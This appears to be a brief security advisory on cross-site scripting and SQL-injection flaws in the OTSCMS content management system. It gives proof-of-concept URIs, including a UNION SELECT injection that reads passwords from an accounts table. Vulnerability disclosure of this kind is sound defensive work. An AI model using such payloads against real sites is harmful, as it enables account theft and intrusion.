OTSCMS Multiple Input Validation Vulnerabilities

OTSCMS Multiple Input Validation Vulnerabilities

To exploit a cross-site scripting issue, an attacker can entices an unsuspecting user into following a malicious URI.

To exploit an SQL-injection issue, an attacker can use a web client.

The following proof-of-concept URIs are available:

http://www.example.com/forum.php?module=User&command=profile&name=[xss]

http://www.example.com/priv.php?command=reply&id=-1%20UNION%20SELECT%20accno,null,password%20FROM%20accounts